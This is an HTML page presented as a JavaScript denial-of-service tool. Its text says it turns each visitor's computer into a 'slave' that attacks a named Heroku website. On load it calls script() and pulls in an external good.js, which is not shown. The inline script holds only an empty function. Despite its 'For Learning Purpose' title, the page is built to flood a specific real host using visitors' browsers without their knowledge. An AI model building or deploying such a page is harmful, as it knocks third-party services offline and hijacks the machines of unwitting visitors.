<!DOCTYPE html>

<html>

<head>
    <title>DDoS Attack Web: For Learning Purpose</title>
    <meta name="description" content="A Tool For Attacking Websites With JavaScript">
    <meta name="keywords" content="JavaScript,DDOS,DOS,Tool, Denial Of Service">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>

<body onload="script();">
    <h1>Welcome to DDoS Web Attack!</h1>
    <p>This website will make your computer as a slave to attack https://adityaalifn.herokuapp.com/</p>



    <script src="good.js" async>
    function name(params) {
        
    }</script>
</body>

</html>